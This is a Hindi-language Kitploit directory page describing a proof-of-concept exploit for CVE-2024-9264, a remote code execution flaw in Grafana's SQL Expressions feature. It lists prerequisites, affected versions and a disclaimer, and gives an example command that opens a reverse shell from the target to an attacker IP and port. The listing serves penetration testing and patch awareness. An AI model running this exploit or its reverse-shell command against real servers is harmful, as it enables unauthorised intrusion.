Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-9264 — CVE-2024-9264 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो SQL एक्सप्रेशन के माध्यम से Grafana में रिमोट कोड एक्जीक्यूशन प्राप्त करता है। इसके लिए प्रमाणित दर्शक पहुंच और DuckDB बाइनरी की आवश्यकता होती है। | Kitploit
उपकरण/GitHubGitHub/royall-researchers/cve-2024-9264
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubroyall-researchers/cve-2024-9264

CVE-2024-9264

CVE-2024-9264 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो SQL एक्सप्रेशन के माध्यम से Grafana में रिमोट कोड एक्जीक्यूशन प्राप्त करता है। इसके लिए प्रमाणित दर्शक पहुंच और DuckDB बाइनरी की आवश्यकता होती है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

CVE-2024-9264-RCE-एक्सप्लॉइट ग्राफाना में SQL एक्सप्रेशन के माध्यम से

विवरण

ग्राफाना (CVE-2024-9264) में रिमोट कोड निष्पादन के लिए प्रूफ ऑफ कॉन्सेप्ट

इस रिपॉजिटरी में एक Python स्क्रिप्ट है जो ग्राफाना के SQL एक्सप्रेशन सुविधा में रिमोट कोड निष्पादन (RCE) कमजोरी का शोषण करती है। अपर्याप्त इनपुट स्वच्छता का लाभ उठाकर, यह शोषण एक हमलावर को सर्वर पर मनमाने शेल कमांड निष्पादित करने की अनुमति देता है। यह shellfs कम्युनिटी एक्सटेंशन के माध्यम से संभव है, जिसे एक हमलावर द्वारा स्थापित और लोड किया जा सकता है ताकि कमांड निष्पादन की सुविधा हो सके।

पूर्वापेक्षाएँ

  • प्रमाणित ग्राफाना उपयोगकर्ता जिसके पास Viewer अनुमतियाँ या उच्चतर हों
  • DuckDB बाइनरी स्थापित होनी चाहिए और ग्राफाना के PATH के माध्यम से सुलभ होनी चाहिए

प्रभावित संस्करण

ग्राफाना >= v11.0.0 (सभी v11.x.y प्रभावित हैं)

उपयोग

root@kitploit:~
python3 poc.py [--url <target>] [--username <username>] [--password <password>] [--reverse-ip <IP>] [--reverse-port <PORT>]

14

उदाहरण

root@kitploit:~
python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001

अस्वीकरण

यह स्क्रिप्ट शैक्षिक उद्देश्यों और नियंत्रित वातावरणों में उपयोग के लिए है जहां आपके पास सिस्टम की सुरक्षा का परीक्षण करने की अनुमति है। इस उपकरण के दुरुपयोग से कानूनी परिणाम हो सकते हैं।

और अधिक

https://zekosec.com/blog/file-read-grafana-cve-2024-9264/

https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264/

टूल डाउनलोड करें